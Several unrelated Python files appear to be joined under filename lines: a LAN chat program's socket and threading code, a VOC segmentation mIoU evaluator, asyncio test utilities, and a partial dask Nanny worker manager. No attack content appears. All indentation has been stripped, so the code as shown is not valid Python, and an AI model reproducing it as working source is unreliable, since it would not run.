try:
notice('Starting input thread', self.color)
self.__input_thread()
except KeyboardInterrupt:
self.__shutdown()
def __listen_thread(self):
if self.mode == 's':
while self.alive:
try:
com, addr = self.__s.accept()
except OSError:
pass
else:
com.setblocking(False)
with self.__client_list_lock:
# prevent list form mutating
# while another thread is iterating
self.clients.append(com)
stats('User count: {}'.format(len(self.clients)), self.color)
def __shutdown(self):
self.alive = False
# wait for threads to exit
notice('\nWaiting for threads to stop.', self.color)
while any((i.isAlive() for i in self.threads)):
time.sleep(1)
# send close to everyone
if self.mode == 'c':
notice('Telling server that im leaving', self.color)
utils.quit(self.__s)
else: # server
try:
with self.__client_list_lock:
new_server = self.clients.pop()
except: # nobody was left
pass
else:
# tell the new server to assume
notice('Assigning new server for network', self.color)
utils.assume_server(new_server)
# tell others to quit
notice('Telling everyone Im leaving', self.color)
with self.__client_list_lock:
for com in self.clients:
utils.quit(com)
notice('LanChat is closing. Use again', self.color)
self.__s.close()
def __get_instructions(self):
"Get info from sockets"
if self.mode == 'c':
c, m = utils.recv(self.__s)
inst = [(c, m, self.__s)]
else:
inst = []
with self.__client_list_lock:
for com in self.clients:
c, m = utils.recv(com)
if c is not None:
inst.append((c, m, com))
return inst
def __process_instructions(self, inst):
"Act on instructions recieved"
to_send = []
for cmd, msg, com in inst:
if cmd not in config.CMDS: # ignore if it is not legal
continue
if cmd == 'MSG':
if self.mode == 's':
to_send.append((msg, com))
if self.color:
txt = config.Col.BOLD + msg + config.Col.ENDC
else:
txt = msg
print(txt)
if self.issue_alert:
os.system(self.alert)
elif cmd == 'QUIT':
if self.mode == 's': # client quit
com.close()
with self.__client_list_lock:
self.clients.remove(com)
else: # server quit
self.__s.close()
self.__make_client() # wait for new server
elif cmd == 'ASSUME':
if self.mode == 'c': # assume a server role if client
self.__s.close()
self.__make_server()
for msg, sender in to_send:
if self.mode == 'c':
utils.msg(msg, self.__s)
else:
with self.__client_list_lock:
for com in self.clients:
if com == sender:
continue
utils.msg(msg, com)
def __beacon_thread(self):
b = utils.get_beacon()
while self.alive:
msg = config.broadcast_msg.encode(config.ENCODING)
b.sendto(msg, config.broadcast_addr)
time.sleep(config.beacon_delay)
b.close()
def __output_thread(self):
"Output thread"
while self.alive:
instructions = self.__get_instructions()
self.__process_instructions(instructions)
def __input_thread(self):
"Input thread"
last_input = time.time()
while self.alive:
x = input(config.prompt)
self.issue_alert = (time.time() - last_input) > 10
last_input = time.time()
msg = self.name + ': ' + x
if self.mode == 'c': # client
utils.msg(msg, self.__s)
else: # server
with self.__client_list_lock:
for com in self.clients:
utils.msg(msg, com)
def __make_server(self):
"Make this node a server"
notice('Making server, getting listening socket', self.color)
self.mode = 's'
sock = utils.get_server_sock()
self.__s = sock
with self.__client_list_lock:
self.clients = deque()
self.threads = deque()
notice('Making beacon', self.color)
b = Thread(target=self.__beacon_thread, name='beacon')
b.start()
self.threads.append(b)
l = Thread(target=self.__listen_thread, name='listen')
notice('Starting listen thread', self.color)
l.start()
self.threads.append(l)
def __make_client(self):
"Make this node a client"
notice('Making client, getting server connection', self.color)
self.mode = 'c'
addr = utils.get_existing_server_addr()
sock = utils.get_client_sock(addr)
self.__s = sock
with self.__client_list_lock:
self.clients = deque()
self.threads = deque()
|
evaluation_cam.py
|
import os
import pandas as pd
import numpy as np
from PIL import Image
import multiprocessing
import argparse
categories = ['background', 'aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow',
'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train',
'tvmonitor']
def do_python_eval(predict_folder, gt_folder, name_list, num_cls=21, input_type='png', threshold=1.0, printlog=False):
TP = []
P = []
T = []
for i in range(num_cls):
TP.append(multiprocessing.Value('i', 0, lock=True))
P.append(multiprocessing.Value('i', 0, lock=True))
T.append(multiprocessing.Value('i', 0, lock=True))
def compare(start, step, TP, P, T, input_type, threshold):
for idx in range(start, len(name_list), step):
name = name_list[idx]
if input_type == 'png':
predict_file = os.path.join(predict_folder, '%s.png' % name)
predict = np.array(Image.open(predict_file)) # cv2.imread(predict_file)
elif input_type == 'npy':
predict_file = os.path.join(predict_folder, '%s.npy' % name)
predict_dict = np.load(predict_file, allow_pickle=True).item()
h, w = list(predict_dict.values())[0].shape
tensor = np.zeros((21, h, w), np.float32)
for key in predict_dict.keys():
tensor[key + 1] = predict_dict[key]
tensor[0, :, :] = threshold
predict = np.argmax(tensor, axis=0).astype(np.uint8)
gt_file = os.path.join(gt_folder, '%s.png' % name)
gt = np.array(Image.open(gt_file))
cal = gt < 255
mask = (predict == gt) * cal
for i in range(num_cls):
P[i].acquire()
P[i].value += np.sum((predict == i) * cal)
P[i].release()
T[i].acquire()
T[i].value += np.sum((gt == i) * cal)
T[i].release()
TP[i].acquire()
TP[i].value += np.sum((gt == i) * mask)
TP[i].release()
p_list = []
for i in range(8):
p = multiprocessing.Process(target=compare, args=(i, 8, TP, P, T, input_type, threshold))
p.start()
p_list.append(p)
for p in p_list:
p.join()
IoU = []
T_TP = []
P_TP = []
FP_ALL = []
FN_ALL = []
for i in range(num_cls):
IoU.append(TP[i].value / (T[i].value + P[i].value - TP[i].value + 1e-10))
T_TP.append(T[i].value / (TP[i].value + 1e-10))
P_TP.append(P[i].value / (TP[i].value + 1e-10))
FP_ALL.append((P[i].value - TP[i].value) / (T[i].value + P[i].value - TP[i].value + 1e-10))
FN_ALL.append((T[i].value - TP[i].value) / (T[i].value + P[i].value - TP[i].value + 1e-10))
loglist = {}
for i in range(num_cls):
loglist[categories[i]] = IoU[i] * 100
miou = np.mean(np.array(IoU))
loglist['mIoU'] = miou * 100
if printlog:
for i in range(num_cls):
if i % 2 != 1:
print('%11s:%7.3f%%' % (categories[i], IoU[i] * 100), end='\t')
else:
print('%11s:%7.3f%%' % (categories[i], IoU[i] * 100))
print('\n======================================================')
print('%11s:%7.3f%%' % ('mIoU', miou * 100))
return loglist
def writedict(file, dictionary):
s = ''
for key in dictionary.keys():
sub = '%s:%s ' % (key, dictionary[key])
s += sub
s += '\n'
file.write(s)
def writelog(filepath, metric, comment):
filepath = filepath
logfile = open(filepath, 'a')
import time
logfile.write(time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
logfile.write('\t%s\n' % comment)
writedict(logfile, metric)
logfile.write('=====================================\n')
logfile.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# The root path for train.txt VOC12 '.../VOCdevkit/VOC2012/ImageSets/Segmentation/train.txt'
parser.add_argument("--list", required=True, type=str)
parser.add_argument("--predict_dir", default='out_cam', type=str)
# The root path for groundtruth VOC12 '.../VOCdevkit/VOC2012/SegmentationClass'
parser.add_argument("--gt_dir", required=True, default='',type=str)
parser.add_argument('--logfile', default='./eval.txt', type=str)
parser.add_argument('--comment', default='', type=str)
parser.add_argument('--type', default='npy', choices=['npy', 'png'], type=str)
parser.add_argument('--t', default=None, type=float)
parser.add_argument('--curve', default=True, type=bool)
args = parser.parse_args()
if args.type == 'npy':
assert args.t is not None or args.curve
df = pd.read_csv(args.list, names=['filename'])
name_list = df['filename'].values
if not args.curve:
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, args.t, printlog=True)
writelog(args.logfile, loglist, args.comment)
else:
l = []
for i in range(20,60):
t = i / 100.0
loglist = do_python_eval(args.predict_dir, args.gt_dir, name_list, 21, args.type, t,printlog=False)
l.append(loglist['mIoU'])
print('%d/60 background score: %.3f\tmIoU: %.3f%%' % (i, t, loglist['mIoU']))
writelog(args.logfile, {'mIoU': l}, args.comment)
|
utils.py
|
"""Utilities shared by tests."""
import sys
import collections
import contextlib
import io
import logging
import os
import re
import selectors
import socket
import socketserver
import tempfile
import threading
import time
import unittest
import weakref
import pytest
from unittest import mock
from http.server import HTTPServer
from wsgiref.simple_server import WSGIRequestHandler, WSGIServer
try:
from asyncio.format_helpers import _get_function_source
except ImportError: # <3.7
from asyncio.events import _get_function_source
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from asyncio import base_events
from asyncio import events
from asyncio import futures
from asyncio import tasks
from asyncio.log import logger
from test import support
def data_file(filename):
if hasattr(support, 'TEST_HOME_DIR'):
fullname = os.path.join(support.TEST_HOME_DIR, 'python', filename)
if os.path.isfile(fullname):
return fullname
fullname = os.path.join(os.path.dirname(__file__), 'python', filename)
if os.path.isfile(fullname):
return fullname
raise FileNotFoundError(filename)
ONLYCERT = data_file('ssl_cert.pem')
ONLYKEY = data_file('ssl_key.pem')
SIGNED_CERTFILE = data_file('keycert3.pem')
SIGNING_CA = data_file('pycacert.pem')
PEERCERT = {
'OCSP': ('http://testca.pythontest.net/testca/ocsp/',),
'caIssuers': ('http://testca.pythontest.net/testca/pycacert.cer',),
'crlDistributionPoints': ('http://testca.pythontest.net/testca/revocation.crl',),
'issuer':
(
(('countryName', 'XY'),), (('organizationName', 'Python Software Foundation CA'),),
(('commonName', 'our-ca-server'),)
),
'notAfter':
'Nov 28 19:09:06 2027 GMT',
'notBefore':
'Jan 19 19:09:06 2018 GMT',
'serialNumber':
'82EDBF41C880919C',
'subject':
(
(('countryName', 'XY'),), (('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),), (('commonName', 'localhost'),)
),
'subjectAltName': (('DNS', 'localhost'),),
'version':
3
}
def simple_server_sslcontext():
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(ONLYCERT, ONLYKEY)
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
return server_context
def simple_client_sslcontext():
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
return client_context
def dummy_ssl_context():
if ssl is None:
return None
else:
return ssl.SSLContext(ssl.PROTOCOL_TLS)
def run_briefly(loop):
async def once():
pass
gen = once()
t = loop.create_task(gen)
# Don't log a warning if the task is not done after run_until_complete().
# It occurs if the loop is stopped or if a task raises a BaseException.
t._log_destroy_pending = False
try:
loop.run_until_complete(t)
finally:
gen.close()
def run_until(loop, pred, timeout=30):
deadline = time.time() + timeout
while not pred():
if timeout is not None:
timeout = deadline - time.time()
if timeout <= 0:
raise futures.TimeoutError()
loop.run_until_complete(tasks.sleep(0.001, loop=loop))
def run_once(loop):
"""Legacy API to run once through the event loop.
This is the recommended pattern for test code. It will poll the
selector once and run all callbacks scheduled in response to I/O
events.
"""
loop.call_soon(loop.stop)
loop.run_forever()
class SilentWSGIRequestHandler(WSGIRequestHandler):
def get_stderr(self):
return io.StringIO()
def log_message(self, format, *args):
pass
class SilentWSGIServer(WSGIServer):
request_timeout = 2
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
return request, client_addr
def handle_error(self, request, client_address):
pass
class SSLWSGIServerMixin:
def finish_request(self, request, client_address):
# The relative location of our test directory (which
# contains the ssl key and certificate files) differs
# between the stdlib and stand-alone asyncio.
# Prefer our own if we can find it.
here = os.path.join(os.path.dirname(__file__), '..', 'tests')
if not os.path.isdir(here):
here = os.path.join(os.path.dirname(os.__file__), 'test', 'test_asyncio')
keyfile = os.path.join(here, 'ssl_key.pem')
certfile = os.path.join(here, 'ssl_cert.pem')
context = ssl.SSLContext()
context.load_cert_chain(certfile, keyfile)
ssock = context.wrap_socket(request, server_side=True)
try:
self.RequestHandlerClass(ssock, client_address, self)
ssock.close()
except OSError:
# maybe socket has been closed by peer
pass
class SSLWSGIServer(SSLWSGIServerMixin, SilentWSGIServer):
pass
def _run_test_server(*, address, use_ssl=False, server_cls, server_ssl_cls):
def app(environ, start_response):
status = '200 OK'
headers = [('Content-type', 'text/plain')]
start_response(status, headers)
return [b'Test message']
# Run the test WSGI server in a separate thread in order not to
# interfere with event handling in the main thread
server_class = server_ssl_cls if use_ssl else server_cls
httpd = server_class(address, SilentWSGIRequestHandler)
httpd.set_app(app)
httpd.address = httpd.server_address
server_thread = threading.Thread(target=lambda: httpd.serve_forever(poll_interval=0.05))
server_thread.start()
try:
yield httpd
finally:
httpd.shutdown()
httpd.server_close()
server_thread.join()
if hasattr(socket, 'AF_UNIX'):
class UnixHTTPServer(socketserver.UnixStreamServer, HTTPServer):
def server_bind(self):
socketserver.UnixStreamServer.server_bind(self)
self.server_name = '127.0.0.1'
self.server_port = 80
class UnixWSGIServer(UnixHTTPServer, WSGIServer):
request_timeout = 2
def server_bind(self):
UnixHTTPServer.server_bind(self)
self.setup_environ()
def get_request(self):
request, client_addr = super().get_request()
request.settimeout(self.request_timeout)
# Code in the stdlib expects that get_request
# will return a socket and a tuple (host, port).
# However, this isn't true for UNIX sockets,
# as the second return value will be a path;
# hence we return some fake data sufficient
# to get the tests going
return request, ('127.0.0.1', '')
class SilentUnixWSGIServer(UnixWSGIServer):
def handle_error(self, request, client_address):
pass
class UnixSSLWSGIServer(SSLWSGIServerMixin, SilentUnixWSGIServer):
pass
def gen_unix_socket_path():
with tempfile.NamedTemporaryFile() as file:
return file.name
@contextlib.contextmanager
def unix_socket_path():
path = gen_unix_socket_path()
try:
yield path
finally:
try:
os.unlink(path)
except OSError:
pass
@contextlib.contextmanager
def run_test_unix_server(*, use_ssl=False):
with unix_socket_path() as path:
yield from _run_test_server(
address=path,
use_ssl=use_ssl,
server_cls=SilentUnixWSGIServer,
server_ssl_cls=UnixSSLWSGIServer
)
@contextlib.contextmanager
def run_test_server(*, host='127.0.0.1', port=0, use_ssl=False):
yield from _run_test_server(
address=(host, port),
use_ssl=use_ssl,
server_cls=SilentWSGIServer,
server_ssl_cls=SSLWSGIServer
)
def make_test_protocol(base):
dct = {}
for name in dir(base):
if name.startswith('__') and name.endswith('__'):
# skip magic names
continue
dct[name] = MockCallback(return_value=None)
return type('TestProtocol', (base,) + base.__bases__, dct)()
class TestSelector(selectors.BaseSelector):
def __init__(self):
self.keys = {}
def register(self, fileobj, events, data=None):
key = selectors.SelectorKey(fileobj, 0, events, data)
self.keys[fileobj] = key
return key
def unregister(self, fileobj):
return self.keys.pop(fileobj)
def select(self, timeout):
return []
def get_map(self):
return self.keys
class TestLoop(base_events.BaseEventLoop):
"""Loop for unittests.
It manages self time directly.
If something scheduled to be executed later then
on next loop iteration after all ready handlers done
generator passed to __init__ is calling.
Generator should be like this:
def gen():
...
when = yield ...
... = yield time_advance
Value returned by yield is absolute time of next scheduled handler.
Value passed to yield is time advance to move loop's time forward.
"""
def __init__(self, gen=None):
super().__init__()
if gen is None:
def gen():
yield
self._check_on_close = False
else:
self._check_on_close = True
self._gen = gen()
next(self._gen)
self._time = 0
self._clock_resolution = 1e-9
self._timers = []
self._selector = TestSelector()
self.readers = {}
self.writers = {}
self.reset_counters()
self._transports = weakref.WeakValueDictionary()
def time(self):
return self._time
def advance_time(self, advance):
"""Move test time forward."""
if advance:
self._time += advance
def close(self):
super().close()
if self._check_on_close:
try:
self._gen.send(0)
except StopIteration:
pass
else: # pragma: no cover
raise AssertionError("Time generator is not finished")
def _add_reader(self, fd, callback, *args):
if sys.version_info >= (3, 7):
self.readers[fd] = events.Handle(callback, args, self, context=None)
else:
self.readers[fd] = events.Handle(callback, args, self)
def _remove_reader(self, fd):
self.remove_reader_count[fd] += 1
if fd in self.readers:
del self.readers[fd]
return True
else:
return False
def assert_reader(self, fd, callback, *args):
if fd not in self.readers:
raise AssertionError('fd %s is not registered' % fd)
handle = self.readers[fd]
if handle._callback != callback:
raise AssertionError('unexpected callback: %s != %s' % (handle._callback, callback))
if handle._args != args:
raise AssertionError('unexpected callback args: %s != %s' % (handle._args, args))
def assert_no_reader(self, fd):
if fd in self.readers:
raise AssertionError('fd %s is registered' % fd)
def _add_writer(self, fd, callback, *args):
if sys.version_info >= (3, 7):
self.writers[fd] = events.Handle(callback, args, self, context=None)
else:
self.writers[fd] = events.Handle(callback, args, self)
def _remove_writer(self, fd):
self.remove_writer_count[fd] += 1
if fd in self.writers:
del self.writers[fd]
return True
else:
return False
def assert_writer(self, fd, callback, *args):
assert fd in self.writers, 'fd {} is not registered'.format(fd)
handle = self.writers[fd]
assert handle._callback == callback, '{!r} != {!r}'.format(handle._callback, callback)
assert handle._args == args, '{!r} != {!r}'.format(handle._args, args)
def _ensure_fd_no_transport(self, fd):
if not isinstance(fd, int):
try:
fd = int(fd.fileno())
except (AttributeError, TypeError, ValueError):
# This code matches selectors._fileobj_to_fd function.
raise ValueError("Invalid file object: " "{!r}".format(fd)) from None
try:
transport = self._transports[fd]
except KeyError:
pass
else:
raise RuntimeError(
'File descriptor {!r} is used by transport {!r}'.format(fd, transport)
)
def add_reader(self, fd, callback, *args):
"""Add a reader callback."""
self._ensure_fd_no_transport(fd)
return self._add_reader(fd, callback, *args)
def remove_reader(self, fd):
"""Remove a reader callback."""
self._ensure_fd_no_transport(fd)
return self._remove_reader(fd)
def add_writer(self, fd, callback, *args):
"""Add a writer callback.."""
self._ensure_fd_no_transport(fd)
return self._add_writer(fd, callback, *args)
def remove_writer(self, fd):
"""Remove a writer callback."""
self._ensure_fd_no_transport(fd)
return self._remove_writer(fd)
def reset_counters(self):
self.remove_reader_count = collections.defaultdict(int)
self.remove_writer_count = collections.defaultdict(int)
def _run_once(self):
super()._run_once()
for when in self._timers:
advance = self._gen.send(when)
self.advance_time(advance)
self._timers = []
def call_at(self, when, callback, *args, context=None):
self._timers.append(when)
if sys.version_info >= (3, 7):
return super().call_at(when, callback, *args, context=context)
else:
return super().call_at(when, callback, *args)
def _process_events(self, event_list):
return
def _write_to_self(self):
pass
def MockCallback(**kwargs):
return mock.Mock(spec=['__call__'], **kwargs)
class MockPattern(str):
"""A regex based str with a fuzzy __eq__.
Use this helper with 'mock.assert_called_with', or anywhere
where a regex comparison between strings is needed.
For instance:
mock_call.assert_called_with(MockPattern('spam.*ham'))
"""
def __eq__(self, other):
return bool(re.search(str(self), other, re.S))
class MockInstanceOf:
def __init__(self, type):
self._type = type
def __eq__(self, other):
return isinstance(other, self._type)
class TestCase(unittest.TestCase):
@staticmethod
def close_loop(loop):
executor = loop._default_executor
if executor is not None:
executor.shutdown(wait=True)
loop.close()
def set_event_loop(self, loop, *, cleanup=True):
assert loop is not None
# ensure that the event loop is passed explicitly in asyncio
events.set_event_loop(None)
if cleanup:
self.addCleanup(self.close_loop, loop)
def new_test_loop(self, gen=None):
loop = TestLoop(gen)
self.set_event_loop(loop)
return loop
def setUp(self):
# self._get_running_loop = events._get_running_loop
# events._get_running_loop = lambda: None
self._thread_cleanup = support.threading_setup()
def tearDown(self):
# events._get_running_loop = self._get_running_loop
events.set_event_loop(None)
# Detect CPython bug #23353: ensure that yield/yield-from is not used
# in an except block of a generator
self.assertEqual(sys.exc_info(), (None, None, None))
self.doCleanups()
support.threading_cleanup(*self._thread_cleanup)
support.reap_children()
@contextlib.contextmanager
def disable_logger():
"""Context manager to disable asyncio logger.
For example, it can be used to ignore warnings in debug mode.
"""
old_level = logger.level
try:
logger.setLevel(logging.CRITICAL + 1)
yield
finally:
logger.setLevel(old_level)
def mock_nonblocking_socket(
proto=socket.IPPROTO_TCP, type=socket.SOCK_STREAM, family=socket.AF_INET
):
"""Create a mock of a non-blocking socket."""
sock = mock.MagicMock(socket.socket)
sock.proto = proto
sock.type = type
sock.family = family
sock.gettimeout.return_value = 0.0
return sock
if sys.version_info < (3, 7):
def force_legacy_ssl_support():
return mock.patch('asyncio.sslproto._is_sslproto_available', return_value=False)
def get_function_source(func):
source = _get_function_source(func)
if source is None:
raise ValueError("unable to get the source of %r" % (func,))
return source
def deprecate(tc, vers=None):
if vers is None or sys.version_info >= vers:
return pytest.deprecated_call()
class _deprecate:
def __init__(self, tc):
pass
def __enter__(self):
return self
def __exit__(self, *tb):
pass
return _deprecate(tc)
|
nanny.py
|
import asyncio
from contextlib import suppress
import errno
import logging
from multiprocessing.queues import Empty
import os
import psutil
import shutil
import threading
import uuid
import warnings
import weakref
import dask
from dask.system import CPU_COUNT
from tornado.ioloop import IOLoop, PeriodicCallback
from tornado import gen
from .comm import get_address_host, unparse_host_port
from .comm.addressing import address_from_user_args
from .core import RPCClosed, CommClosedError, coerce_to_address, Status
from .metrics import time
from .node import ServerNode
from . import preloading
from .process import AsyncProcess
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
get_ip,
mp_context,
silence_logging,
json_load_robust,
parse_timedelta,
parse_ports,
TimeoutError,
)
from .worker import run, parse_memory_limit, Worker
logger = logging.getLogger(__name__)
class Nanny(ServerNode):
""" A process to manage worker processes
The nanny spins up Worker processes, watches then, and kills or restarts
them as necessary. It is necessary if you want to use the
``Client.restart`` method, or to restart the worker automatically if
it gets to the terminate fractiom of its memory limit.
The parameters for the Nanny are mostly the same as those for the Worker.
See Also
--------
Worker
"""
_instances = weakref.WeakSet()
process = None
status = Status.undefined
def __init__(
self,
scheduler_ip=None,
scheduler_port=None,
scheduler_file=None,
worker_port=0,
nthreads=None,
ncores=None,
loop=None,
local_dir=None,
local_directory=None,
services=None,
name=None,
memory_limit="auto",
reconnect=True,
validate=False,
quiet=False,
resources=None,
silence_logs=None,
death_timeout=None,
preload=None,
preload_argv=None,
preload_nanny=None,
preload_nanny_argv=None,
security=None,
contact_address=None,
listen_address=None,
worker_class=None,
env=None,
interface=None,
host=None,
port=None,
protocol=None,
config=None,
**worker_kwargs,
):
self._setup_logging(logger)
self.loop = loop or IOLoop.current()
if isinstance(security, dict):
security = Security(**security)
self.security = security or Security()
assert isinstance(self.security, Security)
self.connection_args = self.security.get_connection_args("worker")
if scheduler_file:
cfg = json_load_robust(scheduler_file)
self.scheduler_addr = cfg["address"]
elif scheduler_ip is None and dask.config.get("scheduler-address"):
self.scheduler_addr = dask.config.get("scheduler-address")
elif scheduler_port is None:
self.scheduler_addr = coerce_to_address(scheduler_ip)
else:
self.scheduler_addr = coerce_to_address((scheduler_ip, scheduler_port))
if protocol is None:
protocol_address = self.scheduler_addr.split("://")
if len(protocol_address) == 2:
protocol = protocol_address[0]
if ncores is not None:
warnings.warn("the ncores= parameter has moved to nthreads=")
nthreads = ncores
self._given_worker_port = worker_port
self.nthreads = nthreads or CPU_COUNT
self.reconnect = reconnect
self.validate = validate
self.resources = resources
self.death_timeout = parse_timedelta(death_timeout)
self.preload = preload
if self.preload is None:
self.preload = dask.config.get("distributed.worker.preload")
self.preload_argv = preload_argv
if self.preload_argv is None:
self.preload_argv = dask.config.get("distributed.worker.preload-argv")
if preload_nanny is None:
preload_nanny = dask.config.get("distributed.nanny.preload")
if preload_nanny_argv is None:
preload_nanny_argv = dask.config.get("distributed.nanny.preload-argv")
self.Worker = Worker if worker_class is None else worker_class
self.env = env or {}
self.config = config or {}
worker_kwargs.update(
{
"port": worker_port,
"interface": interface,
"protocol": protocol,
"host": host,
}
)
self.worker_kwargs = worker_kwargs
self.contact_address = contact_address
self.memory_terminate_fraction = dask.config.get(
"distributed.worker.memory.terminate"
)
if local_dir is not None:
warnings.warn("The local_dir keyword has moved to local_directory")
local_directory = local_dir
if local_directory is None:
local_directory = dask.config.get("temporary-directory") or os.getcwd()
if not os.path.exists(local_directory):
os.makedirs(local_directory)
local_directory = os.path.join(local_directory, "dask-worker-space")
self.local_directory = local_directory
self.preloads = preloading.process_preloads(
self, preload_nanny, preload_nanny_argv, file_dir=self.local_directory
)
self.services = services
self.name = name
self.quiet = quiet
self.auto_restart = True
self.memory_limit = parse_memory_limit(memory_limit, self.nthreads)
if silence_logs:
silence_logging(level=silence_logs)
self.silence_logs = silence_logs
handlers = {
"instantiate": self.instantiate,
"kill": self.kill,
"restart": self.restart,
# cannot call it 'close' on the rpc side for naming conflict
"get_logs": self.get_logs,
"terminate": self.close,
"close_gracefully": self.close_gracefully,
"run": self.run,
}
super(Nanny, self).__init__(
handlers=handlers, io_loop=self.loop, connection_args=self.connection_args
)
self.scheduler = self.rpc(self.scheduler_addr)
if self.memory_limit:
pc = PeriodicCallback(self.memory_monitor, 100)
self.periodic_callbacks["memory"] = pc
if (
not host
and not interface
and not self.scheduler_addr.startswith("inproc://")
):
host = get_ip(get_address_host(self.scheduler.address))
self._start_port = port
self._start_host = host
self._interface = interface
self._protocol = protocol
self._listen_address = listen_address
Nanny._instances.add(self)
self.status = Status.init
def __repr__(self):
return "<Nanny: %s, threads: %d>" % (self.worker_address, self.nthreads)
async def _unregister(self, timeout=10):
if self.process is None:
return
worker_address = self.process.worker_address
if worker_address is None:
return
allowed_errors = (TimeoutError, CommClosedError, EnvironmentError, RPCClosed)
with suppress(allowed_errors):
await asyncio.wait_for(
self.scheduler.unregister(address=self.worker_address), timeout
)
@property
def worker_address(self):
return None if self.process is None else self.process.worker_address
@property
def worker_dir(self):
return None if self.process is None else self.process.worker_dir
@property
def local_dir(self):
""" For API compatibility with Nanny """
warnings.warn("The local_dir attribute has moved to local_directory")
return self.local_directory
async def start(self):
""" Start nanny, start local process, start watching """
await super().start()
ports = parse_ports(self._start_port)
for port in ports:
start_address = address_from_user_args(
host=self._start_host,
port=port,
interface=self._interface,
protocol=self._protocol,
security=self.security,
)
try:
await self.listen(
start_address, **self.security.get_listen_args("worker")
)
except OSError as e:
if len(ports) > 1 and e.errno == errno.EADDRINUSE:
continue
else:
raise e
else:
self._start_address = start_address
break
else:
raise ValueError(
f"Could not start Nanny on host {self._start_host}"
f"with port {self._start_port}"
)
self.ip = get_address_host(self.address)
for preload in self.preloads:
await preload.start()
logger.info(" Start Nanny at: %r", self.address)
response = await self.instantiate()
if response == "running":
assert self.worker_address
self.status = Status.running
else:
await self.close()
self.start_periodic_callbacks()
return self
async def kill(self, comm=None, timeout=2):
""" Kill the local worker process
Blocks until both the process is down and the scheduler is properly
informed
"""
self.auto_restart = False
if self.process is None:
return "OK"
deadline = self.loop.time() + timeout
await self.process.kill(timeout=0.8 * (deadline - self.loop.time()))
async def instantiate(self, comm=None):
""" Start a local worker process
Blocks until the process is up and the scheduler is properly informed
"""
if self._listen_address:
start_arg = self._listen_address
else:
host = self.listener.bound_address[0]
start_arg = self.listener.prefix + unparse_host_port(
host, self._given_worker_port
)
if self.process is None:
worker_kwargs = dict(
scheduler_ip=self.scheduler_addr,
nthreads=self.nthreads,
local_directory=self.local_directory,
services=self.services,
nanny=self.address,
name=self.name,
memory_limit=self.memory_limit,
reconnect=self.reconnect,
resources=self.resources,
validate=self.validate,
silence_logs=self.silence_logs,
death_timeout=self.death_timeout,
preload=self.preload,
preload_argv=self.preload_argv,
security=self.security,
contact_address=self.contact_address,
)
worker_kwargs.update(self.worker_kwargs)
self.process = WorkerProcess(
worker_kwargs=worker_kwargs,
worker_start_args=(start_arg,),
silence_logs=self.silence_logs,
on_exit=self._on_exit_sync,
worker=self.Worker,
env=self.env,
config=self.config,
)
self.auto_restart = True
if self.death_timeout:
try:
result = await asyncio.wait_for(
self.process.start(), self.death_timeout
)
except TimeoutError:
await self.close(timeout=self.death_timeout)
logger.error(
"Timed out connecting Nanny '%s' to scheduler '%s'",
self,
self.scheduler_addr,
)
raise
else:
result = await self.process.start()
return result
async def restart(self, comm=None, timeout=2, executor_wait=True):
start = time()
async def _():
if self.process is not None:
await self.kill()
await self.instantiate()
try:
await asyncio.wait_for(_(), timeout)
except TimeoutError:
logger.error("Restart timed out, returning before finished")
return "timed out"
else:
return "OK"
@property
def _psutil_process(self):
pid = self.process.process.pid
try:
proc = self._psutil_process_obj
except AttributeError:
self._psutil_process_obj = psutil.Process(pid)
if self._psutil_process_obj.pid != pid:
self._psutil_process_obj = psutil.Process(pid)
return self._psutil_process_obj
def memory_monitor(self):
""" Track worker's memory. Restart if it goes above terminate fraction """
if self.status != Status.running:
return
process = self.process.process
if process is None:
return
try:
proc = self._psutil_process
memory = proc.memory_info().rss
except (ProcessLookupError, psutil.NoSuchProcess, psutil.AccessDenied):
return
frac = memory / self.memory_limit
if self.memory_terminate_fraction and frac > self.memory_terminate_fraction:
logger.warning(
"Worker exceeded %d%% memory budget. Restarting",
100 * self.memory_terminate_fraction,
)
process.terminate()
def is_alive(self):
return self.process is not None and self.process.is_alive()
def run(self, *args, **kwargs):
return run(self, *args, **kwargs)
def _on_exit_sync(self, exitcode):
self.loop.add_callback(self._on_exit, exitcode)
async def _on_exit(self, exitcode):
if self.status not in (Status.closing, Status.closed):
try:
await self.scheduler.unregister(address=self.worker_address)
except (EnvironmentError, CommClosedError):
if not self.reconnect:
await self.close()
return
try:
if self.status not in (
Status.closing,
Status.closed,
Status.closing_gracefully,
):
if self.auto_restart:
logger.warning("Restarting worker")
await self.instantiate()
elif self.status == Status.closing_gracefully:
await self.close()
except Exception:
logger.error(
"Failed to restart worker after its process exited", exc_info=True
)
@property
def pid(self):
return self.process and self.process.pid
def _close(self, *args, **kwargs):
warnings.warn("Worker._close has moved to Worker.close", stacklevel=2)
return self.close(*args, **kwargs)
def close_gracefully(self, comm=None):
"""
A signal that we shouldn't try to restart workers if they go away
This is used as part of the cluster shutdown process.
"""
self.status = Status.closing_gracefully
async def close(self, comm=None, timeout=5, report=None):
"""
Close the worker process, stop all comms.
"""
if self.status == Status.closing:
await self.finished()
assert self.status == Status.closed
if self.status == Status.closed:
return "OK"
self.status = Status.closing
logger.info("Closing Nanny at %r", self.address)
for preload in self.preloads:
await preload.teardown()
self.stop()
try:
if self.process is not None:
await self.kill(timeout=timeout)
except Exception:
pass
self.process = None
await self.rpc.close()
self.status = Status.closed
if comm:
await comm.write("OK")
await ServerNode.close(self)
class WorkerProcess:
def __init__(
self,
worker_kwargs,
worker_start_args,
silence_logs,
on_exit,
worker,
env,
config,
):
self.status = Status.init
self.silence_logs = silence_logs
self.worker_kwargs = worker_kwargs
self.worker_start_args = worker_start_args
self.on_exit = on_exit
self.process = None
self.Worker = worker
self.env = env
self.config = config
# Initialized when worker is ready
self.worker_dir = None
